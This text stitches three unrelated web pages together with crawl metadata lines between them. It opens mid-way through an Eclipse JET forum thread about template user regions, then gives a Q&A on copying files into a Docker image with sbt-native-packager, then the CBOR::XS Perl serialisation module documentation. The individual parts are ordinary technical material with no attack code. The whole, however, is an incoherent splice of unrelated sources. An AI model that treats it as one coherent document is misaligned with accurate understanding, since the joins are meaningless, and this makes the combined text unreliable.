time the code is regenerated - please remove the @generated tag. */ <c:include <c:include public class <c:get extends <java:import><c:get._g.<c:get_g</java:import> { <c:if <c:include </c:if> /** * This is the default constructor. */ public <c:get() { super(); <c:userRegion> // BEGIN user region <DefaultConstructor> <c:initialCode // @generated_DefaultConstructor // initial code here... </c:initialCode> // END user region <DefaultConstructor> </c:userRegion> } <c:userRegion> // BEGIN user region <OtherConstructor> <c:initialCode // @generated_OtherConstructor // initial code here... </c:initialCode> // END user region <OtherConstructor> </c:userRegion> <c:userRegion> // BEGIN user region <OtherMethod> <c:initialCode // @generated_OtherMethod // initial code here... </c:initialCode> // END user region <OtherMethod> </c:userRegion> } ___________________________End of template_________________________]]> 2008-03-14T17:46:01-00:00 Update: UserRegion Does not work... Please help <![CDATA[Originally posted by: confmb.capgroup.com I downloaded the latest jet - version 9.0 from March 2008. I am now able to make ONE user region work. This is quite good indeed. But I am still wondering - is multiple user region supported or not? Can someone tell me? Because obviously if it is not then I should not spend time trying to make it work. I just would like to know. Thank you, Frederic]]> 2008-03-14T18:58:17-00:00 Latest Update: UserRegion Does not work... Please help <![CDATA[Originally posted by: confmb.capgroup]]> 2008-03-14T19:15:28-00:00 Re: Latest Update: UserRegion Does not work... Please help <![CDATA[Frederic: As I said on another thread, there was an issue in 0.8.1, which is fixed in 0.8.2 and 0.9.0 Thanks for your patience and persistence. Paul "Frederic" <[email protected]> wrote in message news:cb67bf2e336c5b3d5986a8936b9e63fa >]]> Paul Elder 2008-03-26T14:16:09-00:00 | http://www.eclipse.org/forums/feed.php?mode=m&th=13632&basic=1 | CC-MAIN-2013-48 | refinedweb | 699 | 60.61 |
ADD/COPY files with sbt-native-packager's docker support
I’m using sbt-native-packager 1.0.0-M5 to create my docker image. I need to add a file that’s not a source file or in the resource folder. My docker commands are as follows:
dockerCommands := Seq( Cmd("FROM", "myrepo/myImage:1.0.0"), Cmd("COPY", "test.txt keys/"), // <-- The failing part Cmd("WORKDIR", "/opt/docker"), Cmd("RUN", "[\"chown\", \"-R\", \"daemon\", \".\"]"), Cmd("USER", "daemon"), ExecCmd("CMD", "echo", "Hello, World from Docker") )
It fails with:
msg="test.txt: no such file or directory"
So after digging around a bit it seems I need to have
test.txt in
target/docker/stage. Then it works. But how do I get it there automatically? The file is actually in the root folder of the project.
4 Solutions collect form web for “ADD/COPY files with sbt-native-packager's docker support”
I managed to get it to work by adding the file to
mappings in Universal. So for you, you would need something like this:
mappings in Universal += file("test.txt") -> "keys/test.txt"
You won’t need the
COPY command if you do this, by the way.
Now, I’m not sure if this is going to add this mapping to other sbt-native-packager plugins. I hope a commenter can tell me whether or not this is true, but my intuition is that it will do so, which might be a dealbreaker for you. But any workaround is better than none, right? If you use
Build.scala you could maybe use a VM argument to tell
sbt whether or not to add this mapping…
I was able to get this working using
dockerPackageMappings:
dockerPackageMappings in Docker += (baseDirectory.value / "docker" / "ssh_config") -> "ssh_config" dockerCommands := (dockerCommands.value match { case Seq(from@Cmd("FROM", _), rest@_*) => Seq( from, Cmd("Add", "ssh_config", "/sbin/.ssh/config") ) ++ rest })
I was able to add files this way:
For example, to add a file located in
src/main/resources/docker/some-file.ext
dockerfile in docker := { val targetPath = "/usr/app" // map of (relativeName -> File) of all files in resources/docker dir, for convenience val dockerFiles = { val resources = (unmanagedResources in Runtime).value val dockerFilesDir = resources.find(_.getPath.endsWith("/docker")).get resources.filter(_.getPath.contains("/docker/")).map(r => dockerFilesDir.toURI.relativize(r.toURI).getPath -> r).toMap } new Dockerfile { from(s"$namespace/$baseImageName:$baseImageTag") ... add(dockerFiles("some-file.ext"), s"$targetPath/some-file.ext") ... } }
You may place all additional files (which must be included in container image) into folder
src/universal. Content of that folder will be automatically copied in
/opt/app folder within your container image. You don’t need any additional configuration. See “Getting started with Universal Packaging” for additional info. | http://dockerdaily.com/addcopy-files-with-sbt-native-packagers-docker-support/ | CC-MAIN-2018-26 | refinedweb | 456 | 50.73 |
- NAME
- SYNOPSIS
- DESCRIPTION
- FUNCTIONAL INTERFACE
- OBJECT-ORIENTED INTERFACE
- MAPPING
- MAGIC HEADER
- THE CBOR::XS::Tagged CLASS
- TAG HANDLING AND EXTENSIONS
- CBOR and JSON
- SECURITY CONSIDERATIONS
- BIGNUM SECURITY CONSIDERATIONS
- CBOR IMPLEMENTATION NOTES
- LIMITATIONS ON PERLS WITHOUT 64-BIT INTEGER SUPPORT
- THREADS
- BUGS
- SEE ALSO
- AUTHOR
NAME
CBOR::XS - Concise Binary Object Representation (CBOR, RFC7049)
SYNOPSIS
use CBOR::XS; $binary_cbor_data = encode_cbor $perl_value; $perl_value = decode_cbor $binary_cbor_data; # OO-interface $coder = CBOR::XS->new; $binary_cbor_data = $coder->encode ($perl_value); $perl_value = $coder->decode ($binary_cbor_data); # prefix decoding my $many_cbor_strings = ...; while (length $many_cbor_strings) { my ($data, $length) = $cbor->decode_prefix ($many_cbor_strings); # data was decoded substr $many_cbor_strings, 0, $length, ""; # remove decoded cbor string }
DESCRIPTION
This module converts Perl data structures to the Concise Binary Object Representation (CBOR) and vice versa. CBOR is a fast binary serialisation format that aims to use an (almost) superset of the JSON data model, i.e. when you can represent something useful in JSON, you should be able to represent it in CBOR.
In short, CBOR is a faster and quite compact binary alternative to JSON, with the added ability of supporting serialisation of Perl objects. (JSON often compresses better than CBOR though, so if you plan to compress the data later and speed is less important you might want to compare both formats first).
To give you a general idea about speed, with texts in the megabyte range,
CBOR::XS usually encodes roughly twice as fast as Storable or JSON::XS and decodes about 15%-30% faster than those. The shorter the data, the worse Storable performs in comparison.
Regarding compactness,
CBOR::XS-encoded data structures are usually about 20% smaller than the same data encoded as (compact) JSON or Storable.
In addition to the core CBOR data format, this module implements a number of extensions, to support cyclic and shared data structures (see
allow_sharing and
allow_cycles), string deduplication (see
pack_strings) and scalar references (always enabled).
The primary goal of this module is to be correct and the secondary goal is to be fast. To reach the latter goal it was written in C.
See MAPPING, below, on how CBOR::XS maps perl values to CBOR values and vice versa.
FUNCTIONAL INTERFACE
The following convenience methods are provided by this module. They are exported by default:
- $cbor_data = encode_cbor $perl_scalar
Converts the given Perl data structure to CBOR representation. Croaks on error.
- $perl_scalar = decode_cbor $cbor_data
The opposite of
encode_cbor: expects a valid CBOR string to parse, returning the resulting perl scalar. Croaks on error.
OBJECT-ORIENTED INTERFACE
The object oriented interface lets you configure your own encoding or decoding style, within the limits of supported formats.
- $cbor = new CBOR::XS
Creates a new CBOR::XS object that can be used to de/encode CBOR strings. All boolean flags described below are by default disabled.
The mutators for flags all return the CBOR object again and thus calls can be chained:
my $cbor = CBOR::XS->new->encode ({a => [1,2]});
- $cbor = $cbor->max_depth ([$maximum_nesting_depth])
-
- $max_depth = $cbor->get_max_depth
Sets the maximum nesting level (default
512) accepted while encoding or decoding. If a higher nesting level is detected in CBOR data.
- $cbor = $cbor->max_size ([$maximum_string_size])
-
- $max_size = $cbor->get_max_size
Set the maximum length a CBOR string.
- $cbor = $cbor->allow_unknown ([$enable])
-
- $enabled = $cbor->get_allow_unknown
If
$enableis true (or missing), then
encodewill not throw an exception when it encounters values it cannot represent in CBOR (for example, filehandles) but instead will encode a CBOR
errorvalue.
If
$enableis false (the default), then
encodewill throw an exception when it encounters anything it cannot encode as CBOR.
This option does not affect
decodein any way, and it is recommended to leave it off unless you know your communications partner.
- $cbor = $cbor->allow_sharing ([$enable])
-
- $enabled = $cbor->get_allow_sharing
If
$enableis true (or missing), then
encodewill not double-encode values that have been referenced before (e.g. when the same object, such as an array, is referenced multiple times), but instead will emit a reference to the earlier value.
This means that such values will only be encoded once, and will not result in a deep cloning of the value on decode, in decoders supporting the value sharing extension. This also makes it possible to encode cyclic data structures (which need
allow_cyclesto ne enabled to be decoded by this module).
It is recommended to leave it off unless you know your communication partner supports the value sharing extensions to CBOR (), as without decoder support, the resulting data structure might be unusable.
Detecting shared values incurs a runtime overhead when values are encoded that have a reference counter large than one, and might unnecessarily increase the encoded size, as potentially shared values are encode as shareable whether or not they are actually shared.
At the moment, only targets of references can be shared (e.g. scalars, arrays or hashes pointed to by a reference). Weirder constructs, such as an array with multiple "copies" of the same string, which are hard but not impossible to create in Perl, are not supported (this is the same as with Storable).
If
$enableis false (the default), then
encodewill encode shared data structures repeatedly, unsharing them in the process. Cyclic data structures cannot be encoded in this mode.
This option does not affect
decodein any way - shared values and references will always be decoded properly if present.
- $cbor = $cbor->allow_cycles ([$enable])
-
- $enabled = $cbor->get_allow_cycles
If
$enableis true (or missing), then
decodewill happily decode self-referential (cyclic) data structures. By default these will not be decoded, as they need manual cleanup to avoid memory leaks, so code that isn't prepared for this will not leak memory.
If
$enableis false (the default), then
decodewill throw an error when it encounters a self-referential/cyclic data structure.
FUTURE DIRECTION: the motivation behind this option is to avoid real cycles - future versions of this module might chose to decode cyclic data structures using weak references when this option is off, instead of throwing an error.
This option does not affect
encodein any way - shared values and references will always be encoded properly if present.
- $cbor = $cbor->pack_strings ([$enable])
-
- $enabled = $cbor->get_pack_strings
If
$enableis true (or missing), then
encodewill try not to encode the same string twice, but will instead encode a reference to the string instead. Depending on your data format, this can save a lot of space, but also results in a very large runtime overhead (expect encoding times to be 2-4 times as high as without).
It is recommended to leave it off unless you know your communications partner supports the stringref extension to CBOR (), as without decoder support, the resulting data structure might not be usable.
If
$enableis false (the default), then
encodewill encode strings the standard CBOR way.
This option does not affect
decodein any way - string references will always be decoded properly if present.
- $cbor = $cbor->text_keys ([$enable])
-
- $enabled = $cbor->get_text_keys
If
$enabledis true (or missing), then
encodewill encode all perl hash keys as CBOR text strings/UTF-8 string, upgrading them as needed.
If
$enableis false (the default), then
encodewill encode hash keys normally - upgraded perl strings (strings internally encoded as UTF-8) as CBOR text strings, and downgraded perl strings as CBOR byte strings.
This option does not affect
decodein any way.
This option is useful for interoperability with CBOR decoders that don't treat byte strings as a form of text. It is especially useful as Perl gives very little control over hash keys.
Enabling this option can be slow, as all downgraded hash keys that are encoded need to be scanned and converted to UTF-8.
- $cbor = $cbor->text_strings ([$enable])
-
- $enabled = $cbor->get_text_strings
This option works similar to
text_keys, above, but works on all strings (including hash keys), so
text_keyshas no further effect after enabling
text_strings.
If
$enabledis true (or missing), then
encodewill encode all perl strings as CBOR text strings/UTF-8 strings, upgrading them as needed.
If
$enableis false (the default), then
encodewill encode strings normally (but see
text_keys) - upgraded perl strings (strings internally encoded as UTF-8) as CBOR text strings, and downgraded perl strings as CBOR byte strings.
This option does not affect
decodein any way.
This option has similar advantages and disadvantages as
text_keys. In addition, this option effectively removes the ability to encode byte strings, which might break some
FREEZEand
TO_CBORmethods that rely on this, such as bignum encoding, so this option is mainly useful for very simple data.
- $cbor = $cbor->validate_utf8 ([$enable])
-
- $enabled = $cbor->get_validate_utf8
If
$enableis true (or missing), then
decodewill validate that elements (text strings) containing UTF-8 data in fact contain valid UTF-8 data (instead of blindly accepting it). This validation obviously takes extra time during decoding.
The concept of "valid UTF-8" used is perl's concept, which is a superset of the official UTF-8.
If
$enableis false (the default), then
decodewill blindly accept UTF-8 data, marking them as valid UTF-8 in the resulting data structure regardless of whether that's true or not.
Perl isn't too happy about corrupted UTF-8 in strings, but should generally not crash or do similarly evil things. Extensions might be not so forgiving, so it's recommended to turn on this setting if you receive untrusted CBOR.
This option does not affect
encodein any way - strings that are supposedly valid UTF-8 will simply be dumped into the resulting CBOR string without checking whether that is, in fact, true or not.
- $cbor = $cbor->filter ([$cb->($tag, $value)])
-
- $cb_or_undef = $cbor->get_filter
Sets or replaces the tagged value decoding filter (when
$cbis specified) or clears the filter (if no argument or
undefis provided).
The filter callback is called only during decoding, when a non-enforced tagged value has been decoded (see "TAG HANDLING AND EXTENSIONS" for a list of enforced tags). For specific tags, it's often better to provide a default converter using the
%CBOR::XS::FILTERhash (see below).
The first argument is the numerical tag, the second is the (decoded) value that has been tagged.
The filter function should return either exactly one value, which will replace the tagged value in the decoded data structure, or no values, which will result in default handling, which currently means the decoder creates a
CBOR::XS::Taggedobject to hold the tag and the value.
When the filter is cleared (the default state), the default filter function,
CBOR::XS::default_filter, is used. This function simply looks up the tag in the
%CBOR::XS::FILTERhash. If an entry exists it must be a code reference that is called with tag and value, and is responsible for decoding the value. If no entry exists, it returns no values.
Example: decode all tags not handled internally into
CBOR::XS::Taggedobjects, with no other special handling (useful when working with potentially "unsafe" CBOR data).
CBOR::XS->new->filter (sub { })->decode ($cbor_data);
Example: provide a global filter for tag 1347375694, converting the value into some string form.
$CBOR::XS::FILTER{1347375694} = sub { my ($tag, $value); "tag 1347375694 value $value" };
- $cbor_data = $cbor->encode ($perl_scalar)
Converts the given Perl data structure (a scalar value) to its CBOR representation.
- $perl_scalar = $cbor->decode ($cbor_data)
The opposite of
encode: expects CBOR data and tries to parse it, returning the resulting simple scalar or reference. Croaks on error.
- ($perl_scalar, $octets) = $cbor->decode_prefix ($cbor_data)
This works like the
decodemethod, but instead of raising an exception when there is trailing garbage after the CBOR string, it will silently stop parsing there and return the number of characters consumed so far.
This is useful if your CBOR texts are not delimited by an outer protocol and you need to know where the first CBOR string ends amd the next one starts.
CBOR::XS->new->decode_prefix ("......") => ("...", 3)
INCREMENTAL PARSING
In some cases, there is the need for incremental parsing of JSON texts. While this module always has to keep both CBOR text and resulting Perl data structure in memory at one time, it does allow you to parse a CBOR stream incrementally, using a similar to using "decode_prefix" to see if a full CBOR object is available, but is much more efficient.
It basically works by parsing as much of a CBOR string as possible - if the CBOR data is not complete yet, the pasrer will remember where it was, to be able to restart when more data has been accumulated. Once enough data is available to either decode a complete CBOR value or raise an error, a real decode will be attempted.
A typical use case would be a network protocol that consists of sending and receiving CBOR-encoded messages. The solution that works with CBOR and about anything else is by prepending a length to every CBOR value, so the receiver knows how many octets to read. More compact (and slightly slower) would be to just send CBOR values back-to-back, as
CBOR::XS knows where a CBOR value ends, and doesn't need an explicit length.
The following methods help with this:
- @decoded = $cbor->incr_parse ($buffer)
This method attempts to decode exactly one CBOR value from the beginning of the given
$buffer. The value is removed from the
$bufferon success. When
$bufferdoesn't contain a complete value yet, it returns nothing. Finally, when the
$bufferdoesn't start with something that could ever be a valid CBOR value, it raises an exception, just as
decodewould. In the latter case the decoder state is undefined and must be reset before being able to parse further.
This method modifies the
$bufferin place. When no CBOR value can be decoded, the decoder stores the current string offset. On the next call, continues decoding at the place where it stopped before. For this to make sense, the
$buffermust begin with the same octets as on previous unsuccessful calls.
You can call this method in scalar context, in which case it either returns a decoded value or
undef. This makes it impossible to distinguish between CBOR null values (which decode to
undef) and an unsuccessful decode, which is often acceptable.
- @decoded = $cbor->incr_parse_multiple ($buffer)
Same as
incr_parse, but attempts to decode as many CBOR values as possible in one go, instead of at most one. Calls to
incr_parseand
incr_parse_multiplecan be interleaved.
- $cbor->incr_reset
Resets the incremental decoder. This throws away any saved state, so that subsequent calls to
incr_parseor
incr_parse_multiplestart to parse a new CBOR value from the beginning of the
$bufferagain.
This method can be caled at any time, but it must be called if you want to change your
$bufferor there was a decoding error and you want to reuse the
$cborobject for future incremental parsings.
MAPPING
This section describes how CBOR::XS maps Perl values to CBOR.
CBOR -> PERL
- integers
CBOR integers become (numeric) perl scalars. On perls without 64 bit support, 64 bit integers will be truncated or otherwise corrupted.
- byte strings
Byte strings will become octet strings in Perl (the Byte values 0..255 will simply become characters of the same value in Perl).
- UTF-8 strings
UTF-8 strings in CBOR will be decoded, i.e. the UTF-8 octets will be decoded into proper Unicode code points. At the moment, the validity of the UTF-8 octets will not be validated - corrupt input will result in corrupted Perl strings.
- arrays, maps
CBOR arrays and CBOR maps will be converted into references to a Perl array or hash, respectively. The keys of the map will be stringified during this process.
- null
CBOR null becomes
undefin Perl.
- true, false, undefined
These CBOR values become
Types:Serialiser::true,
Types:Serialiser::falseand
Types::Serialiser::error, respectively. They are overloaded to act almost exactly like the numbers
1and
0(for true and false) or to throw an exception on access (for error). See the Types::Serialiser manpage for details.
- tagged values
Tagged items consists of a numeric tag and another CBOR value.
See "TAG HANDLING AND EXTENSIONS" and the description of
->filterfor details on which tags are handled how.
- anything else
Anything else (e.g. unsupported simple values) will raise a decoding error.
PERL -> CBOR
The mapping from Perl to CBOR is slightly more difficult, as Perl is a typeless language. That means this module can only guess which CBOR type is meant by a perl value.
- hash references
Perl hash references become CBOR maps. As there is no inherent ordering in hash keys (or CBOR maps), they will usually be encoded in a pseudo-random order. This order can be different each time a hash is encoded.
Currently, tied hashes will use the indefinite-length format, while normal hashes will use the fixed-length format.
- array references
Perl array references become fixed-length CBOR arrays.
- other references
Other unblessed references will be represented using the indirection tag extension (tag value
22098,). CBOR decoders are guaranteed to be able to decode these values somehow, by either "doing the right thing", decoding into a generic tagged object, simply ignoring the tag, or something else.
- CBOR::XS::Tagged objects
Objects of this type must be arrays consisting of a single
[tag, value]pair. The (numerical) tag will be encoded as a CBOR tag, the value will be encoded as appropriate for the value. You must use
CBOR::XS::tagto create such objects.
- Types::Serialiser::true, Types::Serialiser::false, Types::Serialiser::error
These special values become CBOR true, CBOR false and CBOR undefined values, respectively. You can also use
\1,
\0and
\undefdirectly if you want.
- other blessed objects
Other blessed objects are serialised via
TO_CBORor
FREEZE. See "TAG HANDLING AND EXTENSIONS" for specific classes handled by this module, and "OBJECT SERIALISATION" for generic object serialisation.
- simple scalars
Simple Perl scalars (any scalar that is not a reference) are the most difficult objects to encode: CBOR::XS will encode undefined scalars as CBOR null values, scalars that have last been used in a string context before encoding as CBOR strings, and anything else as number value:
# dump as number encode_cbor [2] # yields [2] encode_cbor [-3.0e17] # yields [-3e+17] my $value = 5; encode_cbor [$value] # yields [5] # used as string, so dump as string (either byte or text) print $value; encode_cbor [$value] # yields ["5"] # undef becomes null encode_cbor [undef] # yields [null]
You can force the type to be a CBOR string by stringifying it:
my $x = 3.1; # some variable containing a number "$x"; # stringified $x .= ""; # another, more awkward way to stringify print $x; # perl does it for you, too, quite often
You can force whether a string is encoded as byte or text string by using
utf8::upgradeand
utf8::downgrade(if
text_stringsis disabled):
utf8::upgrade $x; # encode $x as text string utf8::downgrade $x; # encode $x as byte string
Perl doesn't define what operations up- and downgrade strings, so if the difference between byte and text is important, you should up- or downgrade your string as late as possible before encoding. You can also force the use of CBOR text strings by using
text_keysor
text_strings.
You can force the type to be a CBOR :).
Perl values that seem to be integers generally use the shortest possible representation. Floating-point values will use either the IEEE single format if possible without loss of precision, otherwise the IEEE double format will be used. Perls that use formats other than IEEE double to represent numerical values are supported, but might suffer loss of precision.
OBJECT SERIALISATION
This module implements both a CBOR-specific and the generic Types::Serialier object serialisation protocol. The following subsections explain both methods.
ENCODING
This module knows two way to serialise a Perl object: The CBOR-specific way, and the generic way.
Whenever the encoder encounters a Perl object that it cannot serialise directly (most of them), it will first look up the
TO_CBOR method on it.
If it has a
TO_CBOR method, it will call it with the object as only argument, and expects exactly one return value, which it will then substitute and encode it in the place of the object.
Otherwise, it will look up the
FREEZE method. If it exists, it will call it with the object as first argument, and the constant string
CBOR as the second argument, to distinguish it from other serialisers.
The
FREEZE method can return any number of values (i.e. zero or more). These will be encoded as CBOR perl object, together with the classname.
These methods MUST NOT change the data structure that is being serialised. Failure to comply to this can result in memory corruption - and worse.
If an object supports neither
TO_CBOR nor
FREEZE, encoding will fail with an error.
DECODING
Objects encoded via
TO_CBOR cannot (normally) be automatically decoded, but objects encoded via
FREEZE can be decoded using the following protocol:
When an encoded CBOR perl object is encountered by the decoder, it will look up the
THAW method, by using the stored classname, and will fail if the method cannot be found.
After the lookup it will call the
THAW method with the stored classname as first argument, the constant string
CBOR as second argument, and all values returned by
FREEZE as remaining arguments.
EXAMPLES
Here is an example
TO_CBOR method:
sub My::Object::TO_CBOR { my ($obj) = @_; ["this is a serialised My::Object object", $obj->{id}] }
When a
My::Object is encoded to CBOR, it will instead encode a simple array with two members: a string, and the "object id". Decoding this CBOR string will yield a normal perl array reference in place of the object.
A more useful and practical example would be a serialisation method for the URI module. CBOR has a custom tag value for URIs, namely 32:
sub URI::TO_CBOR { my ($self) = @_; my $uri = "$self"; # stringify uri utf8::upgrade $uri; # make sure it will be encoded as UTF-8 string CBOR::XS::tag 32, "$_[0]" }
This will encode URIs as a UTF-8 string with tag 32, which indicates an URI.
Decoding such an URI will not (currently) give you an URI object, but instead a CBOR::XS::Tagged object with tag number 32 and the string - exactly what was returned by
TO_CBOR.
To serialise an object so it can automatically be deserialised, you need to use
FREEZE and
THAW. To take the URI module as example, this would be a possible implementation:
sub URI::FREEZE { my ($self, $serialiser) = @_; "$self" # encode url string } sub URI::THAW { my ($class, $serialiser, $uri) = @_; $class->new ($uri) }
Unlike
TO_CBOR, multiple values can be returned by
FREEZE. For example, a
FREEZE method that returns "type", "id" and "variant" values would cause an invocation of
THAW with 5 arguments:
sub My::Object::FREEZE { my ($self, $serialiser) = @_; ($self->{type}, $self->{id}, $self->{variant}) } sub My::Object::THAW { my ($class, $serialiser, $type, $id, $variant) = @_; $class-<new (type => $type, id => $id, variant => $variant) }
MAGIC HEADER
There is no way to distinguish CBOR from other formats programmatically. To make it easier to distinguish CBOR from other formats, the CBOR specification has a special "magic string" that can be prepended to any CBOR string without changing its meaning.
This string is available as
$CBOR::XS::MAGIC. This module does not prepend this string to the CBOR data it generates, but it will ignore it if present, so users can prepend this string as a "file type" indicator as required.
THE CBOR::XS::Tagged CLASS
CBOR has the concept of tagged values - any CBOR value can be tagged with a numeric 64 bit number, which are centrally administered.
CBOR::XS handles a few tags internally when en- or decoding. You can also create tags yourself by encoding
CBOR::XS::Tagged objects, and the decoder will create
CBOR::XS::Tagged objects itself when it hits an unknown tag.
These objects are simply blessed array references - the first member of the array being the numerical tag, the second being the value.
You can interact with
CBOR::XS::Tagged objects in the following ways:
- $tagged = CBOR::XS::tag $tag, $value
This function(!) creates a new
CBOR::XS::Taggedobject using the given
$tag(0..2**64-1) to tag the given
$value(which can be any Perl value that can be encoded in CBOR, including serialisable Perl objects and
CBOR::XS::Taggedobjects).
- $tagged->[0]
-
- $tagged->[0] = $new_tag
-
- $tag = $tagged->tag
-
- $new_tag = $tagged->tag ($new_tag)
Access/mutate the tag.
- $tagged->[1]
-
- $tagged->[1] = $new_value
-
- $value = $tagged->value
-
- $new_value = $tagged->value ($new_value)
Access/mutate the tagged value.
EXAMPLES
Here are some examples of
CBOR::XS::Tagged uses to tag objects.
You can look up CBOR tag value and emanings in the IANA registry at.
Prepend a magic header (
$CBOR::XS::MAGIC):
my $cbor = encode_cbor CBOR::XS::tag 55799, $value; # same as: my $cbor = $CBOR::XS::MAGIC . encode_cbor $value;
Serialise some URIs and a regex in an array:
my $cbor = encode_cbor [ (CBOR::XS::tag 32, ""), (CBOR::XS::tag 32, ""), (CBOR::XS::tag 35, "^[Pp][Ee][Rr][lL]\$"), ];
Wrap CBOR data in CBOR:
my $cbor_cbor = encode_cbor CBOR::XS::tag 24, encode_cbor [1, 2, 3];
TAG HANDLING AND EXTENSIONS
This section describes how this module handles specific tagged values and extensions. If a tag is not mentioned here and no additional filters are provided for it, then the default handling applies (creating a CBOR::XS::Tagged object on decoding, and only encoding the tag when explicitly requested).
Tags not handled specifically are currently converted into a CBOR::XS::Tagged object, which is simply a blessed array reference consisting of the numeric tag value followed by the (decoded) CBOR value.
Future versions of this module reserve the right to special case additional tags (such as base64url).
ENFORCED TAGS
These tags are always handled when decoding, and their handling cannot be overridden by the user.
- 26 (perl-object,)
These tags are automatically created (and decoded) for serialisable objects using the
FREEZE/THAWmethods (the Types::Serialier object serialisation protocol). See "OBJECT SERIALISATION" for details.
These tags are automatically decoded when encountered (and they do not result in a cyclic data structure, see
allow_cycles), resulting in shared values in the decoded object. They are only encoded, however, when
allow_sharingis enabled.
Not all shared values can be successfully decoded: values that reference themselves will currently decode as
undef(this is not the same as a reference pointing to itself, which will be represented as a value that contains an indirect reference to itself - these will be decoded properly).
Note that considerably more shared value data structures can be decoded than will be encoded - currently, only values pointed to by references will be shared, others will not. While non-reference shared values can be generated in Perl with some effort, they were considered too unimportant to be supported in the encoder. The decoder, however, will decode these values as shared values.
- 256, 25 (stringref-namespace, stringref,)
These tags are automatically decoded when encountered. They are only encoded, however, when
pack_stringsis enabled.
- 22098 (indirection,)
This tag is automatically generated when a reference are encountered (with the exception of hash and array references). It is converted to a reference when decoding.
- 55799 (self-describe CBOR, RFC 7049)
This value is not generated on encoding (unless explicitly requested by the user), and is simply ignored when decoding.
NON-ENFORCED TAGS
These tags have default filters provided when decoding. Their handling can be overridden by changing the
%CBOR::XS::FILTER entry for the tag, or by providing a custom
filter callback when decoding.
When they result in decoding into a specific Perl class, the module usually provides a corresponding
TO_CBOR method as well.
When any of these need to load additional modules that are not part of the perl core distribution (e.g. URI), it is (currently) up to the user to provide these modules. The decoding usually fails with an exception if the required module cannot be loaded.
- 0, 1 (date/time string, seconds since the epoch)
These tags are decoded into Time::Piece objects. The corresponding
Time::Piece::TO_CBORmethod always encodes into tag 1 values currently.
The Time::Piece API is generally surprisingly bad, and fractional seconds are only accidentally kept intact, so watch out. On the plus side, the module comes with perl since 5.10, which has to count for something.
- 2, 3 (positive/negative bignum)
These tags are decoded into Math::BigInt objects. The corresponding
Math::BigInt::TO_CBORmethod encodes "small" bigints into normal CBOR integers, and others into positive/negative CBOR bignums.
- 4, 5, 264, 265 (decimal fraction/bigfloat)
Both decimal fractions and bigfloats are decoded into Math::BigFloat objects. The corresponding
Math::BigFloat::TO_CBORmethod always encodes into a decimal fraction (either tag 4 or 264).
NaN and infinities are not encoded properly, as they cannot be represented in CBOR.
See "BIGNUM SECURITY CONSIDERATIONS" for more info.
- 30 (rational numbers)
These tags are decoded into Math::BigRat objects. The corresponding
Math::BigRat::TO_CBORmethod encodes rational numbers with denominator
1via their numerator only, i.e., they become normal integers or
bignums.
See "BIGNUM SECURITY CONSIDERATIONS" for more info.
- 21, 22, 23 (expected later JSON conversion)
CBOR::XS is not a CBOR-to-JSON converter, and will simply ignore these tags.
- 32 (URI)
These objects decode into URI objects. The corresponding
URI::TO_CBORmethod again results in a CBOR URI value.
CBOR and JSON
CBOR is supposed to implement a superset of the JSON data model, and is, with some coercion, able to represent all JSON texts (something that other "binary JSON" formats such as BSON generally do not support).
CBOR implements some extra hints and support for JSON interoperability, and the spec offers further guidance for conversion between CBOR and JSON. None of this is currently implemented in CBOR, and the guidelines in the spec do not result in correct round-tripping of data. If JSON interoperability is improved in the future, then the goal will be to ensure that decoded JSON data will round-trip encoding and decoding to CBOR intact.
SECURITY CONSIDERATIONS
When you are using CBOR in a protocol, talking to untrusted potentially hostile creatures requires relatively few measures.
First of all, your CBOR decoder should be secure, that is, should not have any buffer overflows. Obviously, this module should ensure that and I am trying hard on making that true, but you never know.
Second, you need to avoid resource-starving attacks. That means you should limit the size of CBOR data you accept, or make sure then when your resources run out, that's just fine (e.g. by using a separate process that can crash safely). The size of a CBOR string in octets is usually a good indication of the size of the resources required to decode it into a Perl structure. While CBOR::XS can check the size of the CBOR text, it might be too late when you already have it in memory, so you might want to check the size before you accept the string.
Third, CBOR::XS recurses using the C stack when decoding objects and arrays. The C stack is a limited resource: for instance, on my amd64 machine with 8MB of stack size I can decode around 180k nested arrays but only 14k nested CBOR method.
Something else could bomb you, too, that I forgot to think of. In that case, you get to keep the pieces. I am always open for hints, though...
Also keep in mind that CBOR::XS might leak contents of your Perl data structures in its error messages, so when you serialise sensitive information you might want to make sure that exceptions thrown by CBOR::XS will not end up in front of untrusted eyes.
BIGNUM SECURITY CONSIDERATIONS
CBOR::XS provides a
TO_CBOR method for both Math::BigInt and Math::BigFloat that tries to encode the number in the simplest possible way, that is, either a CBOR integer, a CBOR bigint/decimal fraction (tag 4) or an arbitrary-exponent decimal fraction (tag 264). Rational numbers (Math::BigRat, tag 30) can also contain bignums as members.
CBOR::XS will also understand base-2 bigfloat or arbitrary-exponent bigfloats (tags 5 and 265), but it will never generate these on its own.
Using the built-in Math::BigInt::Calc support, encoding and decoding decimal fractions is generally fast. Decoding bigints can be slow for very big numbers (tens of thousands of digits, something that could potentially be caught by limiting the size of CBOR texts), and decoding bigfloats or arbitrary-exponent bigfloats can be extremely slow (minutes, decades) for large exponents (roughly 40 bit and longer).
Additionally, Math::BigInt can take advantage of other bignum libraries, such as Math::GMP, which cannot handle big floats with large exponents, and might simply abort or crash your program, due to their code quality.
This can be a concern if you want to parse untrusted CBOR. If it is, you might want to disable decoding of tag 2 (bigint) and 3 (negative bigint) types. You should also disable types 5 and 265, as these can be slow even without bigints.
Disabling bigints will also partially or fully disable types that rely on them, e.g. rational numbers that use bignums.
CBOR IMPLEMENTATION NOTES
This section contains some random implementation notes. They do not describe guaranteed behaviour, but merely behaviour as-is implemented right now.
64 bit integers are only properly decoded when Perl was built with 64 bit support.
Strings and arrays are encoded with a definite length. Hashes as well, unless they are tied (or otherwise magical).
Only the double data type is supported for NV data types - when Perl uses long double to represent floating point values, they might not be encoded properly. Half precision types are accepted, but not encoded.
Strict mode and canonical mode are not implemented.
LIMITATIONS ON PERLS WITHOUT 64-BIT INTEGER SUPPORT
On perls that were built without 64 bit integer support (these are rare nowadays, even on 32 bit architectures, as all major Perl distributions are built with 64 bit integer support), support for any kind of 64 bit integer in CBOR is very limited - most likely, these 64 bit values will be truncated, corrupted, or otherwise not decoded correctly. This also includes string, array and map sizes that are stored as 64 bit integers.
THREADS
This module is not guaranteed to be thread safe and there are no plans to change this until Perl gets thread support (as opposed to the horribly slow so-called "threads" which are simply slow and bloated process simulations - use fork, it's much faster, cheaper, better).
(It might actually work, but you have been warned). and JSON::XS modules that do similar, but human-readable, serialisation.
The Types::Serialiser module provides the data model for true, false and error values.
AUTHOR
Marc Lehmann <[email protected]> | https://metacpan.org/pod/CBOR::XS | CC-MAIN-2016-40 | refinedweb | 5,736 | 51.38 |
NAME
